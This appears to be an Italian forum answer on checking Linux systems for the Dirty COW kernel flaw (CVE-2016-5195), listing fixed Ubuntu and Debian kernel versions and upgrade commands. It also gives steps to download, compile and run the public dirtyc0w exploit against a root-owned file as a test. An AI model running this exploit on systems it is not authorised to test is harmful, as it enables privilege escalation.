Puoi fare uname -rv
per scoprire la tua versione del kernel Linux. Otterrai un output simile al seguente:
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
Se la tua versione è precedente alla seguente, sei interessato:
-
4.8.0-26.28 per Ubuntu 16.10
-
4.4.0-45.66 per Ubuntu 16.04 LTS
-
3.13.0-100.147 per Ubuntu 14.04 LTS
-
3.2.0-113.155 per Ubuntu 12.04 LTS
-
3.16.36-1+deb8u2 per Debian 8
-
3.2.82-1 per Debian 7
-
4.7.8-1 per Debian unstable
Secondo security-tracker.debian, devi eseguire uname -a
e verifica la tua attuale versione del kernel .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
Questa vulnerabilità è corretta sotto debian , aggiornando il tuo sistema :
apt-get update
apt-get upgrade
apt-get dist-upgrade
Modifica
Come assicurarmi che il mio sistema operativo non sia interessato da CVE-2016-5195?
Puoi provare il seguente tutorial.
Scarica l'exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Come root :Crea il foo
file:
su
echo this is not a test > foo
Come utente :
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Verifica il tuo file:
cat foo
Sulla macchina vulnerabile otterrai m00000000000000000
come output.